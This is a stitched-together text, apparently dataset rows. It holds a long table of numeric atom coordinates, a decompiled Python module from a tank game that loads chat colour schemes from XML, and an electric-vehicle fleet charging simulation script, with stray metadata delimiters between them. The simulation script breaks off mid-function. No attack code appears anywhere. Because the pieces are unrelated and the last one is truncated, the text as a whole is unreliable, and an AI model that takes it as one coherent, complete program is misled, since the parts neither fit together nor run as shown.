1635 1 0.0541817 0.870841 0.56846
1640 1 0.12635 0.93388 0.562746
1762 1 0.0681476 0.932663 0.620367
1765 1 0.122891 0.87666 0.622708
1636 1 0.00157425 0.938534 0.562022
515 1 0.0703673 0.999518 0.560968
645 1 0.131743 0.995555 0.625593
1633 1 0.00532228 0.873063 0.504375
517 1 0.130482 0.993892 0.503383
1639 1 0.188148 0.877234 0.56338
1643 1 0.31236 0.869711 0.563016
1644 1 0.252374 0.933924 0.559707
1766 1 0.18728 0.937412 0.622797
1769 1 0.25338 0.879961 0.621401
1770 1 0.313217 0.932796 0.620364
649 1 0.247137 0.992232 0.621698
523 1 0.310493 0.996307 0.565896
519 1 0.192141 0.995749 0.55773
1642 1 0.315905 0.938842 0.500896
527 1 0.442207 0.990902 0.558618
1647 1 0.435686 0.866802 0.56337
1648 1 0.376841 0.940462 0.567177
1773 1 0.374848 0.875037 0.623439
1774 1 0.449204 0.93334 0.620878
653 1 0.373752 0.995633 0.623835
657 1 0.501091 0.995658 0.625647
1652 1 0.508506 0.927614 0.557993
1777 1 0.514153 0.876984 0.622685
1651 1 0.565307 0.863759 0.563472
1656 1 0.623787 0.9373 0.557918
1778 1 0.568042 0.940677 0.633984
1781 1 0.627751 0.879667 0.623737
535 1 0.690702 0.99469 0.556191
1658 1 0.811953 0.936467 0.50156
1655 1 0.687288 0.868958 0.558591
1659 1 0.815921 0.865259 0.56601
1660 1 0.748102 0.941139 0.559396
1782 1 0.68932 0.937411 0.623969
1785 1 0.749303 0.871937 0.624402
1786 1 0.809934 0.92365 0.625135
537 1 0.749148 0.999248 0.502024
665 1 0.748864 0.997697 0.628126
1761 1 0.994217 0.883749 0.623713
1662 1 0.937157 0.937996 0.50414
1663 1 0.940811 0.87562 0.559837
1664 1 0.870262 0.930471 0.564493
1789 1 0.881728 0.876805 0.630772
1790 1 0.937116 0.94171 0.618211
543 1 0.932132 0.999901 0.557159
1661 1 0.874568 0.873138 0.507702
513 1 0.993735 0.996835 0.503275
1672 1 0.128661 0.556564 0.69278
1699 1 0.0626459 0.622614 0.684618
1794 1 0.0584561 0.565807 0.754422
1800 1 0.117255 0.560376 0.816762
1827 1 0.0581086 0.621906 0.815313
1829 1 0.122176 0.626201 0.746265
1825 1 0.000927646 0.623167 0.748832
1667 1 0.0644101 0.510196 0.691298
1676 1 0.250939 0.565924 0.693475
1703 1 0.186532 0.618494 0.688592
1707 1 0.316606 0.623236 0.693135
1798 1 0.184798 0.555719 0.753055
1802 1 0.308803 0.55985 0.753777
1804 1 0.242829 0.555955 0.812048
1831 1 0.178174 0.61642 0.808433
1833 1 0.246819 0.623384 0.757083
1835 1 0.314235 0.617847 0.808405
1799 1 0.176944 0.502566 0.818962
1680 1 0.366963 0.553971 0.691225
1711 1 0.440018 0.622556 0.686064
1806 1 0.434579 0.55732 0.74967
1808 1 0.378216 0.556348 0.807915
1837 1 0.380236 0.620338 0.748389
1839 1 0.429927 0.624142 0.810753
1841 1 0.496434 0.618979 0.738948
1812 1 0.497855 0.569108 0.812532
1811 1 0.555183 0.505299 0.81179
1684 1 0.500338 0.56212 0.687628
1688 1 0.619556 0.560397 0.689018
1715 1 0.561802 0.624637 0.684268
1810 1 0.560588 0.569353 0.754978
1816 1 0.627843 0.564667 0.812796
1843 1 0.560764 0.627658 0.815531
1845 1 0.626142 0.624854 0.75372
1691 1 0.812886 0.510429 0.68981
1819 1 0.813908 0.5072 0.807933
1687 1 0.682539 0.500192 0.694734
1692 1 0.745767 0.570186 0.687849
1719 1 0.691758 0.638048 0.691398
1723 1 0.815 0.629478 0.688214
1814 1 0.685206 0.566238 0.749605
1818 1 0.807231 0.573731 0.746857
1820 1 0.750576 0.561896 0.810396
1847 1 0.691083 0.628666 0.821795
1849 1 0.741565 0.625369 0.750561
1851 1 0.814918 0.633615 0.808603
1817 1 0.749462 0.50167 0.749182
1668 1 0.994123 0.564479 0.689767
1796 1 0.992341 0.556906 0.819162
1821 1 0.875112 0.519107 0.750626
1696 1 0.868303 0.566617 0.686306
1727 1 0.931006 0.624428 0.687636
1822 1 0.938765 0.565836 0.751024
1824 1 0.873004 0.570549 0.81468
1853 1 0.878055 0.627869 0.749892
1855 1 0.937233 0.629258 0.815238
1704 1 0.127357 0.688403 0.685922
1731 1 0.0656157 0.739667 0.689659
1736 1 0.126642 0.81402 0.68583
1826 1 0.0630989 0.681175 0.751552
1832 1 0.126434 0.683295 0.812578
1858 1 0.0685548 0.813385 0.748242
1859 1 0.0654836 0.742769 0.804829
1861 1 0.123546 0.743764 0.749121
1864 1 0.123814 0.814739 0.809601
1732 1 0.00410423 0.811858 0.686413
1857 1 0.00546487 0.75727 0.743508
1700 1 0.00337364 0.685107 0.685149
1708 1 0.246202 0.684647 0.694699
1735 1 0.18533 0.748488 0.687897
1739 1 0.314409 0.745686 0.683164
1740 1 0.248577 0.815179 0.684342
1830 1 0.186578 0.687984 0.747689
1834 1 0.308037 0.680154 0.758826
1836 1 0.244019 0.691593 0.808686
1862 1 0.185986 0.814852 0.752746
1863 1 0.189409 0.755641 0.808953
1865 1 0.25004 0.752794 0.749262
1866 1 0.314838 0.823347 0.749681
1867 1 0.31622 0.757218 0.796315
1868 1 0.255785 0.820876 0.809593
1712 1 0.373635 0.686638 0.692328
1743 1 0.441849 0.749204 0.6858
1744 1 0.375673 0.816271 0.692405
1838 1 0.439246 0.684541 0.743689
1840 1 0.373856 0.685276 0.805048
1869 1 0.379728 0.744766 0.751222
1870 1 0.44066 0.803871 0.747369
1871 1 0.442798 0.75053 0.808357
1872 1 0.376326 0.820104 0.806345
1844 1 0.495254 0.682664 0.803896
1873 1 0.501716 0.750363 0.747141
1716 1 0.504841 0.69062 0.688428
1876 1 0.501742 0.812484 0.809302
1748 1 0.500809 0.815223 0.68336
1720 1 0.616985 0.684974 0.685445
1747 1 0.566337 0.751423 0.680909
1752 1 0.627526 0.82043 0.694109
1842 1 0.555983 0.681574 0.753152
1848 1 0.623222 0.688778 0.812994
1874 1 0.564661 0.803745 0.748038
1875 1 0.56412 0.748311 0.808607
1877 1 0.623871 0.746396 0.74477
1880 1 0.621131 0.807044 0.807666
1724 1 0.752983 0.689397 0.691297
1751 1 0.692449 0.752581 0.682638
1755 1 0.810602 0.753414 0.686071
1756 1 0.751069 0.812528 0.68141
1846 1 0.692438 0.694763 0.75718
1850 1 0.812349 0.694788 0.752263
1852 1 0.751713 0.686402 0.810863
1878 1 0.68747 0.809029 0.745115
1879 1 0.690596 0.75519 0.819292
1881 1 0.746244 0.754285 0.754112
1882 1 0.809917 0.812979 0.752302
1883 1 0.812113 0.748382 0.809449
1884 1 0.749354 0.812123 0.812536
1860 1 0.995338 0.81524 0.811748
1828 1 0.998973 0.683127 0.812445
1728 1 0.872015 0.688281 0.693198
1759 1 0.937343 0.750166 0.69745
1760 1 0.874753 0.810894 0.694431
1854 1 0.939853 0.688355 0.749811
1856 1 0.880896 0.695499 0.813197
1885 1 0.874497 0.750009 0.753822
1886 1 0.93311 0.819712 0.74887
1887 1 0.941366 0.748159 0.811771
1888 1 0.868601 0.815179 0.809952
771 1 0.0652551 0.998573 0.817833
1763 1 0.0595545 0.875037 0.679436
1768 1 0.122077 0.933827 0.686508
1890 1 0.0754607 0.939243 0.757212
1891 1 0.0665838 0.879346 0.812965
1893 1 0.129874 0.87298 0.753244
1896 1 0.127682 0.943416 0.823455
1764 1 0.000737483 0.948535 0.688658
1889 1 0.00152018 0.870852 0.740848
1892 1 0.00956521 0.939134 0.816562
769 1 0.00646791 0.996925 0.751376
651 1 0.312254 0.995286 0.684397
777 1 0.248955 0.995976 0.745769
1767 1 0.186497 0.873788 0.688215
1771 1 0.315509 0.873705 0.686776
1772 1 0.246137 0.938839 0.691968
1894 1 0.178034 0.943885 0.760966
1895 1 0.188015 0.870944 0.820605
1897 1 0.249049 0.872571 0.748926
1898 1 0.314196 0.934689 0.74448
1899 1 0.312011 0.879898 0.813035
1900 1 0.244108 0.933743 0.812697
779 1 0.302316 0.996075 0.813684
647 1 0.182582 0.993628 0.693338
781 1 0.368634 0.999751 0.748338
655 1 0.433668 0.998089 0.682406
785 1 0.494596 0.993296 0.746944
1775 1 0.439646 0.868516 0.679036
1776 1 0.379029 0.934447 0.679424
1901 1 0.376592 0.87721 0.745309
1902 1 0.432611 0.942566 0.750461
1903 1 0.431779 0.87466 0.821221
1904 1 0.369699 0.944457 0.815061
1908 1 0.489023 0.937407 0.816359
1905 1 0.498196 0.875171 0.744337
1780 1 0.496238 0.936127 0.689293
659 1 0.561137 0.993709 0.695018
1779 1 0.566371 0.877202 0.689495
1784 1 0.630843 0.940965 0.685754
1906 1 0.554945 0.937221 0.750168
1907 1 0.557115 0.880611 0.813823
1909 1 0.615933 0.874299 0.749116
1912 1 0.618265 0.940706 0.813014
795 1 0.812359 0.99992 0.809992
1783 1 0.691266 0.873545 0.68353
1787 1 0.816168 0.872625 0.688535
1788 1 0.74734 0.935007 0.690563
1910 1 0.685529 0.932213 0.742827
1911 1 0.686367 0.864264 0.810475
1913 1 0.74911 0.877539 0.743126
1914 1 0.814855 0.937031 0.747482
1915 1 0.808865 0.877879 0.807432
1916 1 0.744332 0.940419 0.808937
1791 1 0.938941 0.871601 0.685237
1792 1 0.877685 0.933984 0.691598
1917 1 0.872895 0.876231 0.754815
1918 1 0.938216 0.938037 0.754049
1919 1 0.93273 0.879161 0.814623
1920 1 0.875082 0.945752 0.811891
1925 1 0.115442 0.50013 0.882325
1922 1 0.0624937 0.56336 0.881055
1928 1 0.124154 0.560157 0.945431
1955 1 0.0643197 0.624432 0.942539
1957 1 0.120807 0.619835 0.882251
1924 1 0.00691918 0.564055 0.943627
1927 1 0.189645 0.505098 0.940493
1929 1 0.249734 0.501064 0.878832
1930 1 0.309503 0.5591 0.875755
1926 1 0.184794 0.561382 0.881998
1963 1 0.310629 0.615005 0.942467
1961 1 0.248489 0.616534 0.874031
1932 1 0.248518 0.562332 0.938656
1959 1 0.187392 0.625902 0.939319
1041 1 0.497269 0.50332 0.99081
1933 1 0.381089 0.504555 0.876314
1073 1 0.498667 0.620253 0.997603
1037 1 0.382452 0.500998 0.997237
1965 1 0.370931 0.617818 0.878549
1934 1 0.438366 0.566883 0.869529
1936 1 0.370007 0.559655 0.940722
1967 1 0.429809 0.620207 0.945876
1969 1 0.496138 0.63353 0.872352
1940 1 0.495981 0.568499 0.927648
1042 1 0.553235 0.559515 0.991594
1939 1 0.558882 0.500234 0.934215
1077 1 0.622034 0.619021 0.999373
1937 1 0.501454 0.500098 0.870899
1938 1 0.559521 0.566101 0.871358
1944 1 0.62387 0.563557 0.933492
1971 1 0.558954 0.625778 0.937839
1973 1 0.628654 0.624055 0.876901
1941 1 0.61971 0.503522 0.869527
1943 1 0.687763 0.512576 0.937344
1945 1 0.751291 0.501339 0.883137
1942 1 0.697516 0.562156 0.87082
1946 1 0.811446 0.558847 0.86926
1977 1 0.768596 0.630878 0.87158
1979 1 0.817754 0.629393 0.941844
1948 1 0.750465 0.561053 0.932377
1975 1 0.69477 0.626106 0.931374
1081 1 0.754896 0.618411 0.996646
1949 1 0.875218 0.50395 0.87256
1953 1 0.992481 0.625938 0.87819
1950 1 0.939078 0.56467 0.874298
1981 1 0.873885 0.631321 0.877664
1983 1 0.937413 0.622494 0.939802
1952 1 0.872688 0.561735 0.935327
1951 1 0.93788 0.506483 0.937786
1986 1 0.0698715 0.806325 0.870003
1987 1 0.0632812 0.74858 0.938523
1954 1 0.0556766 0.683892 0.87875
1992 1 0.126331 0.813577 0.938953
1989 1 0.129027 0.743516 0.867178
1960 1 0.121693 0.693166 0.928875
1985 1 0.00475754 0.752623 0.869966
1058 1 0.0649677 0.684551 0.997604
1094 1 0.187194 0.805347 0.995163
1098 1 0.317555 0.808865 0.995948
1097 1 0.250086 0.744663 0.997966
1996 1 0.241803 0.815243 0.934471
1990 1 0.184851 0.810403 0.879641
1994 1 0.316597 0.808941 0.876513
1958 1 0.191184 0.679829 0.871486
1993 1 0.247906 0.74988 0.874902
1964 1 0.245311 0.676424 0.93429
1995 1 0.312599 0.746914 0.936445
1962 1 0.311306 0.688372 0.874594
1991 1 0.190793 0.742122 0.933117
1066 1 0.312434 0.681681 0.996786
2000 1 0.374037 0.816024 0.936316
1966 1 0.425765 0.68362 0.868846
1997 1 0.372853 0.74833 0.876708
1999 1 0.435871 0.744228 0.926123
1998 1 0.434721 0.809243 0.873897
1968 1 0.36785 0.685098 0.939323
2001 1 0.498688 0.737869 0.865196
1972 1 0.497389 0.687418 0.934671
2004 1 0.494638 0.806411 0.937733
1070 1 0.435601 0.684571 0.99748
1101 1 0.378405 0.752876 0.990688
1106 1 0.565719 0.807593 0.993464
1074 1 0.564017 0.683227 0.994829
1105 1 0.501508 0.750519 0.996474
2003 1 0.559888 0.747135 0.93119
1976 1 0.626957 0.691464 0.936545
2005 1 0.627255 0.751546 0.873488
2002 1 0.560135 0.804248 0.870269
2008 1 0.621512 0.811488 0.93675
1970 1 0.561633 0.688494 0.867445
1109 1 0.628932 0.751041 0.99706
2006 1 0.689639 0.810962 0.877862
2012 1 0.760923 0.817648 0.93498
2009 1 0.750874 0.752182 0.872264
2011 1 0.811676 0.743974 0.936279
2010 1 0.812295 0.81434 0.870188
1980 1 0.751407 0.686871 0.933274
1974 1 0.69116 0.689354 0.874778
2007 1 0.700375 0.750969 0.941062
1978 1 0.820917 0.693206 0.877639
1110 1 0.699962 0.818602 0.99564
1114 1 0.824946 0.815628 0.9991
1956 1 0.999436 0.686185 0.937307
1988 1 0.995585 0.81517 0.940553
1982 1 0.94266 0.692717 0.876111
1984 1 0.883811 0.691165 0.939776
2016 1 0.871872 0.80527 0.931034
2015 1 0.936095 0.757894 0.936308
2013 1 0.87302 0.754588 0.8684
2014 1 0.938512 0.818933 0.868913
2017 1 0.0104741 0.872219 0.875095
2018 1 0.0641637 0.940272 0.879881
2021 1 0.122058 0.875625 0.876234
2024 1 0.121978 0.943024 0.939036
2020 1 0.0130986 0.93323 0.942253
2019 1 0.0689774 0.870519 0.94127
1122 1 0.0692996 0.941594 0.993751
905 1 0.243662 0.997242 0.87654
907 1 0.312456 0.989022 0.93389
2023 1 0.181154 0.877381 0.936318
2028 1 0.240474 0.938732 0.947242
2025 1 0.250772 0.869018 0.872725
2022 1 0.184045 0.938206 0.881224
2027 1 0.305709 0.884342 0.939571
2026 1 0.298802 0.93523 0.873704
1129 1 0.243674 0.871934 0.998796
9 1 0.257176 0.998053 0.998817
17 1 0.49963 0.993594 0.996769
2036 1 0.497658 0.935594 0.932123
2031 1 0.433783 0.873561 0.937563
2032 1 0.371095 0.927622 0.93481
2030 1 0.434524 0.944204 0.880385
1133 1 0.373849 0.877495 0.99641
2033 1 0.495125 0.873016 0.877088
2029 1 0.36751 0.871011 0.877305
13 1 0.376928 0.996454 0.991166
1134 1 0.438165 0.934005 0.99125
2035 1 0.561437 0.866497 0.934565
2034 1 0.556522 0.938878 0.877989
2040 1 0.620703 0.93928 0.93445
2037 1 0.627134 0.869473 0.868351
1138 1 0.560755 0.930604 0.993915
917 1 0.629312 0.998096 0.871117
1146 1 0.812314 0.944641 0.994347
2038 1 0.681985 0.934376 0.865693
921 1 0.749994 0.996311 0.874173
2042 1 0.815743 0.936553 0.872318
2044 1 0.751111 0.936747 0.93767
2043 1 0.8185 0.876889 0.938709
1142 1 0.685408 0.940446 0.996802
2041 1 0.747362 0.878802 0.874908
2039 1 0.679463 0.878265 0.9325
919 1 0.683039 0.996018 0.933229
1145 1 0.759272 0.877068 0.998892
25 1 0.741738 0.995281 0.994121
1149 1 0.882261 0.883536 0.997016
927 1 0.942771 0.995405 0.940353
2045 1 0.875798 0.875155 0.866489
2046 1 0.940973 0.942026 0.873173
2047 1 0.934804 0.876119 0.931346
2048 1 0.879052 0.944519 0.934353
1121 1 0.992805 0.873387 0.996621
1150 1 0.943477 0.935311 0.993898
29 1 0.88387 0.98976 0.999217
| [
"[email protected]"
] | |
2372a02f129a67fbf7970e593aecdaeb2bdb38b5 | 55647a80c8b412af9df0ba3f50595cc2f29c25e6 | /res/scripts/client/messenger/doc_loaders/colors_schemes.py | 5d932c37ceee7ccf7724d9394a83e08eff0f0204 | [] | no_license | cnsuhao/WOT-0.9.17-CT | 0035eb6070fb4fab8d8ee9f8bbc676c10d511cfb | d1f932d8cabaf8aa21708622e87f83c8d24d6451 | refs/heads/master | 2021-06-08T18:11:07.039293 | 2016-11-19T19:12:37 | 2016-11-19T19:12:37 | null | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 2,484 | py | # 2016.11.19 19:53:40 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/messenger/doc_loaders/colors_schemes.py
from messenger.doc_loaders import _xml_helpers
def _readColors(xmlCtx, section, colorsNames, defName):
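    # Parse <color> subsections into {name: rgb}; names missing from the XML fall back to the default colour (defName).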
result = {}
notFound = colorsNames[:]
for tagName, subSec in section.items():
if tagName != 'color':
raise _xml_helpers.XMLError(xmlCtx, 'Tag "{0:>s}" is invalid'.format(tagName))
ctx = xmlCtx.next(subSec)
name = _xml_helpers.readNoEmptyStr(ctx, subSec, 'name', 'Section "name" is not defined')
if name not in colorsNames:
raise _xml_helpers.XMLError(ctx, 'Name of color {0:>s} is invalid'.format(name))
result[name] = _xml_helpers.readRGB(ctx, subSec, 'rgb', 'Color is invalid.')
notFound.remove(name)
if len(notFound):
defColor = 0
if defName in result:
defColor = result[defName]
for name in notFound:
result[name] = defColor
return result
def _readColorScheme(xmlCtx, section, colorScheme):
names = colorScheme.getColorsNames()
defName = colorScheme.getDefColorName()
for tagName, subSec in section.items():
if tagName == 'name':
continue
if tagName != 'item':
raise _xml_helpers.XMLError(xmlCtx, 'Tag "{0:>s}" is invalid'.format(tagName))
ctx = xmlCtx.next(subSec)
name = _xml_helpers.readNoEmptyStr(ctx, subSec, 'name', 'Section "name" is not defined')
colorsSec = subSec['colors']
if not colorsSec:
raise _xml_helpers.XMLError(ctx, 'Section "colors" is not defined')
colorScheme[name] = _readColors(ctx.next(colorsSec), colorsSec, names, defName)
def load(xmlCtx, section, messengerSettings):
for tagName, subSec in section.items():
if tagName != 'colorScheme':
raise _xml_helpers.XMLError(xmlCtx, 'Tag {0:>s} is invalid'.format(tagName))
ctx = xmlCtx.next(subSec)
name = _xml_helpers.readNoEmptyStr(ctx, subSec, 'name', 'Color scheme name is not defined')
colorScheme = messengerSettings.getColorScheme(name)
if colorScheme is not None:
_readColorScheme(ctx, subSec, colorScheme)
return
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\messenger\doc_loaders\colors_schemes.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.11.19 19:53:40 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
b0059167390bda100df2b9fb1dfdfd3c359fe18c | 4b2f0dae781d91baec5b94055e23720838c0feda | /Fleet Simulation/archive/simFunctionsVer8.py | 8b6810e2f51188af4585a31306f5e394dbfc12ca | [] | no_license | tiff413/EV-Technology-2019 | ec88eb411a3ce5f39387b682cd853da86e364ec3 | 7fe8a3bda28a5ac9b6d0b29fa27621e9ceca4fe5 | refs/heads/master | 2021-01-03T22:28:16.873563 | 2020-03-13T11:01:46 | 2020-03-13T11:01:46 | 240,260,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41,093 | py | import pandas as pd
import numpy as np
import datetime as dt
import time
# CHOOSE NUMBER OF CHUNKS IN AN HOUR
# e.g. 3 chunks would divide the hour into 20-min shifts
chunks = 2
##############################
# TIME FUNCTIONS
##############################
# CONVERTS TIME INTO DATETIME
def readTime(ti):
if len(ti) == 5: read = (dt.datetime.strptime(ti, "%H:%M")).time()
elif len(ti) == 8: read = (dt.datetime.strptime(ti, "%H:%M:%S")).time()
elif len(ti) == 10: read = (dt.datetime.strptime(ti, "%Y-%m-%d")).date()
else: read = dt.datetime.strptime(ti, "%Y-%m-%d %H:%M:%S")
return read
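# e.g. readTime("2019-01-01 06:00:00") -> datetime.datetime(2019, 1, 1, 6, 0)  (illustrative input)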
# READS IN A DATETIME AND REFORMATS IT
def rereadTime(ti):
reread = str(ti)
read = dt.datetime.strptime(reread, "%Y-%m-%d %H:%M:%S")
return read
# INCREMENTS TIME BY THE HOUR TO EXECUTE SIMULATION
def incrementTime(ti):
return (rereadTime(ti) + dt.timedelta(hours=1/chunks))
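# with chunks = 2, each call advances the simulation clock by 30 minutes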
##############################
# MISC FUNCTIONS
##############################
# SELECT FLEET DATA IN EXECUTION FILE BASED ON:
# number of cars
# battery size
# number of fast charge points
def selectCase(df, params):
for key in params: df = df.loc[df[key] == params[key]]
return df
# RETRIEVES COLUMN DATA FROM DATAFRAME
def getData(df, col):
return df[col].values[0]
# GENERATE CAR DATA AND CHARGE POINT DATA
def getLists(df):
# initialise charge points data
slow_cps = getData(df, 'slowChargePts')
fast_cps = getData(df, 'fastChargePts')
rapid_cps = getData(df, 'rapidChargePts')
chargePts = slow_cps + fast_cps + rapid_cps
chargePt_data = ([[22,1]]*rapid_cps + [[7,1]]*fast_cps + [[3,1]]*slow_cps)
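    # each charge point row: [maxRate (kW), inUse] -- 22kW rapid, 7kW fast, 3kW slow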
# initialise car data
smallCars = getData(df, 'smallCars')
mediumCars = getData(df, 'mediumCars')
largeCars = getData(df, 'largeCars')
car_data = [[30, 1, 30, np.nan, -1, np.nan, np.nan]]*smallCars + [[40, 1, 40, np.nan, -1, np.nan, np.nan]]*mediumCars + [[70, 1, 70, np.nan, -1, np.nan,np.nan]]*largeCars
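    # each car row: [battkW, inDepot, battSize, chargePt, shiftIndex, latestStartShift, latestEndShift]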
# assign available charge points to cars
for cp_id in range(chargePts):
size = car_data[cp_id][0]
car_data[cp_id] = [size,1,size,cp_id,-1,np.nan,np.nan]
return car_data, chargePt_data
# ORGANISE DATAFRAME FOR VIEWING
def dfFunction(df, col):
DF = df.set_index(['time','totalCost',col])
DF = DF.T.stack().T
return DF
######################################
# FOR COLOURING CELLS IN SIMULATION DF
######################################
def crColour(val):
if val > 0: color = 'green'
elif val == 0: color = 'green'
else: color = 'red'
return 'color: %s' % color
def crBackground(val):
if val > 0: color = '#adfc83'
elif val == 0: color = '#daed0c'
else: color = '#fab9b9'
return 'background-color: %s' % color
def eventBackground(val):
if val == 'full': color = '#00b200'
elif val == 'charge': color = '#adfc83'
elif val == 'drive': color = '#fab9b9'
elif val == 'wait': color = '#daed0c'
elif val == 'RC': color = 'red'
else: color = None
return 'background-color: %s' % color
def styleDF(df):
DF = df.style.\
applymap(crColour, subset=['chargeDiff']).\
applymap(crBackground, subset=['chargeDiff']).\
applymap(eventBackground, subset=['event'])
return DF
################################################################
# UNPACK SHIFT DATA FROM DATA FRAME INTO LIBRARY (SHIFTS BY CAR)
################################################################
def unpackShifts(carData, allShiftsDF):
# INITIALISE LIBRARY
shiftsByCar = {}
# FOR ALL CARS:
for cars in range(0, len(carData)):
# SELECT DATA FOR CAR
shiftsDFcar = allShiftsDF.loc[allShiftsDF['car']==cars]
# CREATE NEW DATAFRAME FOR UNPACKED SHIFTS
shiftsDF = pd.DataFrame(columns=["startShift","endShift"])
# FOR EVERY DAY, UNPACK SHIFTS INTO DATA FRAME:
for day in range(len(shiftsDFcar)):
# READ IN THE DATE AS A STRING AND LIST OF SHIFTS
dayStr = str(shiftsDFcar.loc[(shiftsDFcar.index[day]), 'day'])
shiftsLi = eval(shiftsDFcar.loc[(shiftsDFcar.index[day]), 'shift'])
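            # shiftsLi is a list of "HH:MM-HH:MM" strings, e.g. ["06:00-14:00", "22:00-06:00"] (illustrative);
            # a shift whose end time is earlier than its start is treated below as running overnight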
# ***** UNPACK AND REFORMAT SHIFTS INTO NEW DATAFRAME *****
# FOR EVERY SHIFT:
for shift in range(0, len(shiftsLi)):
# SPLIT SHIFT INTO START SHIFT AND END SHIFT
splitShift = shiftsLi[shift].split("-")
# IF START SHIFT < END SHIFT, ASSUME SHIFT DOESN'T RUN OVERNIGHT
if readTime(splitShift[0]) < readTime(splitShift[1]):
# FORMAT DATE AND TIME TO START AND END SHIFT
startS = dayStr + " " + splitShift[0]
endS = dayStr + " " + splitShift[1]
# IF START SHIFT > END SHIFT, ASSUME SHIFT RUNS OVERNIGHT
else:
# FOR START SHIFT, FORMAT USING CURRENT DATE
startS = dayStr + " " + splitShift[0]
# FOR END SHIFT, FORMAT USING DATE OF THE NEXT DAY
nextDay = readTime(dayStr) + dt.timedelta(days=1)
endS = str(nextDay) + " " + splitShift[1]
# APPEND START AND END SHIFT AS A ROW IN SHIFTS DF
newRow = {"startShift" : startS,
"endShift" : endS}
shiftsDF = shiftsDF.append(newRow, ignore_index=True)
# SORT SHIFTS DF AND ASSIGN TO LIBRARY
shiftsDF = shiftsDF.sort_values(by=['startShift'])
shiftsDF = shiftsDF.reset_index(drop=True)
shiftsByCar['%s' % cars] = shiftsDF
return shiftsByCar
##############################################
# IMPLEMENT CHANGES AT START AND END OF SHIFTS
##############################################
# WHEN SHIFT STARTS:
# Remove from depot
# Let inDepot = 0 in carDataDF
# If connected to chargePt, remove chargePt
# WHEN SHIFT ENDS:
# Enter depot
# Let inDepot = 1 in carDataDF
def inOutDepot(carDataDF, shiftsByCar, time, depot, chargePtDF, toChargeDF, eventChange):
# FOR EVERY CAR:
for car in range(0, len(carDataDF)):
# ***** CHECK IF CAR IS AT THE END OF A SHIFT *****
# IF TIME == END TIME OF CURRENT SHIFT:
if str(time) == carDataDF.loc[car, 'latestEndShift']:
# ENTER DEPOT
carDataDF.loc[car,'inDepot'] = 1
depot.append(car)
# RECOGNISE AN EVENT HAS HAPPENED
eventChange = True
# ***** CHECK IF CAR IS AT THE START OF A SHIFT *****
# READ INDEX OF CURRENT SHIFT AND LENGTH OF SHIFTS BY CAR
shiftIndex = carDataDF.loc[car, 'shiftIndex']
lastShiftIndex = len(shiftsByCar[str(car)])
# IF NEXT SHIFT EXISTS:
if (shiftIndex + 1) < lastShiftIndex:
# READ START TIME AND END TIME OF THE NEXT SHIFT
nextStartShift = shiftsByCar[str(car)].loc[shiftIndex+1, 'startShift']
nextEndShift = shiftsByCar[str(car)].loc[shiftIndex+1, 'endShift']
# IF TIME == START TIME OF THE NEXT SHIFT:
if str(time) == nextStartShift:
# EXIT DEPOT
carDataDF.loc[car,'inDepot'] = 0
depot.remove(car)
# REMOVE CHARGE PT IN CHARGE PT DF
pt = carDataDF.loc[car,'chargePt']
if not np.isnan(pt):
chargePtDF.loc[pt,'inUse'] = np.nan
# print("remove charge point "+str(pt))
# REMOVE CHARGE PT IN CAR DATA DF
carDataDF.loc[car,'chargePt'] = np.nan
# LET CHARGE RATE = 0 IN TO-CHARGE DF
toChargeDF.loc[car,'chargeRate'] = 0
# UPDATE SHIFT DATA IN CAR DATA DF
carDataDF.loc[car, 'shiftIndex'] = shiftIndex + 1
carDataDF.loc[car, 'latestStartShift'] = nextStartShift
carDataDF.loc[car, 'latestEndShift'] = nextEndShift
# RECOGNISE AN EVENT HAS HAPPENED
eventChange = True
return carDataDF, depot, chargePtDF, toChargeDF, eventChange
################################################
# READ CARS WITH FULL BATTERY INTO SIMULATION DF
################################################
def readFullBattCars(carDataDF, simulationDF, toChargeDF, time, totalCost, eventChange):
# SELECT VEHICLES IN THE DEPOT WITH FULL BATTERY
chargeDF = carDataDF.loc[carDataDF['inDepot'] == 1]
fullBattDF = chargeDF.loc[chargeDF['battkW'] == chargeDF['battSize']]
# IF CAR IS FULLY CHARGED, LET CHARGE RATE = 0 IN TO-CHARGE DF
for row in range(len(fullBattDF)):
car = fullBattDF.index[row]
toChargeDF.loc[car, 'chargeRate'] = 0
# ***** IF NEW CARS REACH FULL BATT, RECOGNISE EVENT *****
# CREATE A SET FOR CARS THAT HAD FULL BATT IN PREVIOUS TIME
prevSimData = simulationDF.iloc[-len(carDataDF):]
prevFullBatt = prevSimData.loc[prevSimData['event']=="full"]
prevFullBattCars = set(prevFullBatt['car'].values.tolist())
# CREATE A SET FOR CARS THAT CURRENTLY HAVE FULL BATT
fullBattCars = set(fullBattDF.index.tolist())
# IF NO. OF FULL BATT CARS >= PREVIOUS NO. OF FULL BATT CARS:
if len(fullBattCars) >= len(prevFullBattCars):
# AND IF INDEX OF FULL BATT CARS ARE DIFFERENT FROM PREVIOUS FULL BATT CARS:
if fullBattCars != prevFullBattCars:
# RECOGNISE AN EVENT HAS HAPPENED
eventChange = True
return toChargeDF, eventChange
################################################
# READ TARIFF CHANGES
################################################
def readTariffChanges(time, pricesDF, company, eventChange):
# READ IN START AND END TIMES OF GREEN ZONE
greenStart = pricesDF.loc[pricesDF['company']==company, 'startGreenZone'].to_string(index=False)
greenEnd = pricesDF.loc[pricesDF['company']==company, 'endGreenZone'].to_string(index=False)
# READ IN TIME WITHOUT DATE
timeHr = readTime(str(time.time()))
    # IF TIME == START OR END OF GREEN ZONE, THERE IS A TARIFF CHANGE
if timeHr == readTime(greenStart) or timeHr == readTime(greenEnd):
# RECOGNISE AN EVENT HAS HAPPENED
eventChange = True
return eventChange
###############################
# LOOK AT CARS OUTSIDE THE DEPOT
# FOR CARS THAT NEED RAPID CHARGING: RAPID CHARGE
# FOR CARS THAT DON'T NEED RAPID CHARGING: DECREASE BATT
###############################
def driving(carDataDF, time, rcCount, RCduration, RCperc, simulationDF, driveDataByCar, ind, totalCost):
# FIND CARS OUTSIDE OF DEPOT
drivingCarsDF = carDataDF.loc[carDataDF["inDepot"]==0]
# ***** DIVIDE CARS THAT NEED RAPID CHARGING AND CARS THAT DONT INTO 2 LISTS *****
# FIND CARS TO RAPID CHARGE AND APPEND TO LIST
toRapidCharge = []
# IF NO NEED TO RAPID CHARGE, APPEND TO ANOTHER LIST
dontRapidCharge = []
